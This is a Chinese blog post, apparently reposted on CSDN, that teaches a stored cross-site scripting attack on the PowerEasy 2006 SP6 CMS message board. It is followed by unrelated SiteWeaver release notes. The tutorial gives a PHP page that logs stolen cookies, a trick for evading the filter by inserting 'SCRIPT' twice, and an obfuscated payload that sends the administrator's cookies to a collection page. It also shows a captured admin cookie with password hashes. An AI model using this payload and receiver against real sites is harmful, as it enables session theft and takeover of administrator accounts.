动易html编辑器漏洞,动易2006_SP6最新漏洞得到管理员密码

鬼仔注:从7j那里看到的,并且有7j写的接收页面。

7j:没有找到他说的接收页面,只有自已用PHP写个了

$filename = date("Ymd").".txt";

$time = @date("Y年m月d号H点i分s秒",time());

$cookie = $_POST['cookie'];

$url = $_POST['url'];

$hostname = $_POST['hostname'];

if ($cookie <> ""){

$tmp = fopen($filename,"a+");

fwrite($tmp,"地址:".$url."\n主机:".$hostname."\nCookie:".$cookie."\nIP:".$_SERVER['REMOTE_ADDR']."\n".$time."\n");

fclose($tmp);

}

?>

来源:′失眠ヤ夜 's blog

漏洞主要出现在“雁过留声(留言板)”、“信息管理”和“短消息”里,这里以留言板为例

下面我们来测试一下漏洞

打开留言板,选择源代码模式签写留言

审核发表状态下钓到管理员Cookies的几率比较到

我们先来试试一些文字

输入<>未被过滤

输入

输入scrSCRIPTipt会过滤成script(去掉了中间的大写SCRIPT)

看 漏洞出来了

也就是说它会把"Script"字符过滤掉,但是只过滤一次,给了我们可乘之机

(iframe标签你可以自己测试)

下面是一个获得Cookies的代码,会把Cookies提交到http://localhost/cookies/cookies.asp,相关的代码我会打包到教程里

现在我们在一些可能的敏感字符中插入SCRIPT字符,以防我们的代码被过滤

更改后的代码如下:

rSCRIPTedir.cooSCRIPTkie.valSCRIPTue=docSCRIPTument.coSCRIPTokie;redSCRIPTir.urSCRIPTl.vaSCRIPTlue=locSCRIPTation.hrSCRIPTef;redSCRIPTir.hostnamSCRIPTe.vaSCRIPTlue=locatiSCRIPTon.hostnSCRIPTame;redSCRIPTir.subSCRIPTmit();

现在我们发表留言

看 数据库里的代码是我们修改前的代码

现在以管理员身份登录

现在我们保存cookies的数据库是空的

这是我发送的钓Cookies的网页

好的,现在代码已经执行,管理员的Cookies已经被我们钓到了

我们来看一下

ASPSESSIONIDQCRQQSAT=LCNFLHOBLBPHEJJMHJDPDMGF; localhostpowereasy=LastPassword=4P263W7JiD425kyd&UserName=admin&AdminLoginCode=PowerEasy2006&AdminName=admin&UserPassword=469e80d32c0559f8&RndPassword=4P263W7JiD425kyd&AdminPassword=469e80d32c0559f8

怎么样?得到了吧?

里面有管理员的用户名、密码,和管理认证码

信息管理和短消息也可以如法炮制,具体方法我就不多说了

在这里说一下 拿到源码后先要修改一下设置,conn.asp里的数据库路径要改一下

还有test.htm里的URL也要改一下,可以用它做测试

PowerEasy?SiteWeaver?6.5版是完全开源的!并且PowerEasy?SiteWeaver?CMS6.5版和PowerEasy?SiteWeaver?eShop6.5版二个子产品将完全免费提供给个人非商业使用!用户可免费下载、免费使用、免费升级,无使用时间与功能限制。 PowerEasy?SiteWeaver?6.5版同时提供了ACCESS数据库和MSSQL数据库。无论您是商业用户还是免费用户,都可以根据自己的需要选择简单易用的ACCESS数据库还是高性能的MSSQL数据库。 所有动易2006的用户都可以免费升级到PowerEasy?SiteWeaver?6.5版。压缩包中已经提供了相应的升级程序和升级说明。升级过程将是非常简单的。 把“源代码”文件夹的所有文件上传到你的服务器上,然后运行 http://你的网址/Install.asp 进行安装。 如果您在安装或使用过程中遇到任何问题,请到动易帮助中心(http://help.powereasy.net)查看解决方法。动易帮助中心为您提供了最全面的关于动易产品的知识文档。 从2006版升级的操作步骤: 第一步、备份好当前正在运行动易2006版的网站的Conn.asp和Config.asp。 第二步、将“源代码”中的所有文件复制到当前网站中,覆盖原来的文件。 第三步、根据原来Conn.asp和Config.asp中的设置,修改新Conn.asp和Config.asp中的设置。 第四步、按照“升级及转换程序\动易2006ToSiteWeaver6.5数据库升级程序”中的说明将2006版的数据库升级好。 第五步、登录后台,进入“系统设置--频道管理”,更新所有频道文件。 第六步、进入“系统设置--网站风格管理”,刷新风格CSS文件。 第七步、进入各频道的栏目管理,刷新栏目JS。 第八步、如果启用了商城,还需要进入“系统设置--在线支付平台管理”,设置在线支付平台的相应参数。 PowerEasySiteWeaver6.5相对于动易2006的功能更新说明: ●代码结构完全重新设计和优化,由原来的调用组件方式改成适用常规ASP程序的文件包含及过程调用方式。 ●优化了一些代码和算法,使得性能提升了30%,生成速度提升了50%,资源占用减少了50%。在特别情况下更是提升了几倍不止(如“生成所有未生成的文章”功能)。 ●经过BCT的审计,修复了不少动易2006版中存在的漏洞。为了安全,大家一定要升级到这个版本! ●改进了生成HTML的方式,将原来的“快速生成”和“慢速生成”相结合为新的生成方式。新的生成方式采用每页生成指定数量的HTML页方式,这种方式即具有原来“快速生成”的速度优点,又避免了原来“快速生成”方式在单个页面内生成所有HTML页会极大占用CPU和内存的缺点。 ●改进了生成JS方式,将原来的发表文章时自动更新JS文件但不显示任何信息的方式改为与自动生成HTML类似的方式。 ●新增支付平台管理功能,前台增加提供多个在线支付平台供用户选择的功能
动易® SiteWeaver™ CMS 是一套面向各类中小型站点建设和管理而设计研发的通用建站管理系统(又称内容管理系统),是目前国内用户数量最多(超过30万网站),最受用户欢迎的CMS系统。其强大的功能和简单易用的完善融合赢得了广大用户的一致认可。系统基于ASP语言和MSSQL/ACCESS数据库开发,无论在稳定性、代码优化、运行效率、负载能力、安全等级、功能可操控性和权限严密性等方面都居国内外同类产品领先地位。 动易® SiteWeaver™ CMS 是开源和免费的,用户可免费下载、免费使用、免费升级,无使用时间与功能限制。 “PowerEasy® SiteWeaver™ ”寓意为“网站编织者”,象征着产品的易用性、灵活性等特性,此产品线为面向中小型站点建设和管理而设计研发,以其ASP平台的简单、易用和产品本身的易用性、灵活性等特性,为快速建设中小型网站提供了最快的入门途径和最佳实践。 PowerEasy® SiteWeaver™ 产品的前身是动易公司自主研发的PowerEasy® 2006版系列产品。可以自豪地说,PowerEasy® 2006版系列产品绝对是一款经典产品,它拥有超过30万网站的应用规模,占据了国内网站总数1/4的市场份额,赢得了遍及政府、企业、科研教育和媒体等各个行业的广泛的赞誉,稳据国内内容管理系统的领头羊位置。 SiteWeaver6.8在之前版本的基础上,对系统易用性,安全性,兼容性进行了较大的更新与升级。 一、数据库字段与标签,布局调整 SiteWeaver6.8 根据实际情况调整了一些数据库字段,标签参数和后台界面,让整个系统的运行效率和执行效率更高。比如,调整了用户登录次数字段,问卷调查保存答案字段的字段长度,以避免出现数据溢出的情况,调整了相关文章,自定义列表文章等标签,拓展了标签的功能,还有调整了软件发布的界面布局,使其更符合用户的填写习惯。 二、安全性更新 SiteWeaver6.8修复了发现的绝大部分bug,对标签参数进行更严格的过滤,加强检测支付流程,为用户打造一个更安全的系统。目前,SiteWeaver 6.8 版本的系统安全性已经非常强壮了。 三、系统与标签兼容性 SiteWeaver6.8对系统标签进行一次比较全面的检测,对大部分标签都做了容错处理,特别是对自定义标签的内置方法进行了较大改进。同时修复了在最新IE8浏览器下出现的一些错误,让系统更好的兼容IE8浏览器。 四、大量新功能的融入 SiteWeaver6.8 根据用户的反馈增加了大量、实用的新功能,比如匿名投稿,会员中心模板化,更新最新的IP数据库等等,相信能带给你一次全新的体验。 090918 bug 更新列表 1、修复从源代码中获取下一页的URL 方式的采集跳转可能出错的bug 2、修复图片内容页当图片为外部图片时显示不正确的bug 3、修复ie8下复制模板后跳转网址出错的bug 4、修复文章,软件,图片自定义列表中不解析能支持html的自定义字段的bug 5、文章,软件,图片自定义列表中,插入图片类型的自定义字段时,直接显示解析好的图片代码(该字段为空时不显示) 6、调整添加自定义字段时默认值长度设置成100 7、修复启用ajax评论时收缩图标路径错误的bug 8、修复上传文件管理删除文件夹时跳转出错的bug 9、修复后台按照商品ID搜索搜索不到的bug 10、修复修改文章启用调查出错的bug 11、修复图片内容页用{$PhotoUrl}标签无法获取到地址的bug 12、修复按照时间方式采集时跳转出错的bug 13、修复商城不能用自定义html的字段的bug 14、加大多行文本类型自定义字段的字符限制 15、自定义标签里面采用分页时支持条件判断标签.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
©️2022 CSDN 皮肤主题:游动-白 设计师:我叫白小胖 返回首页
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值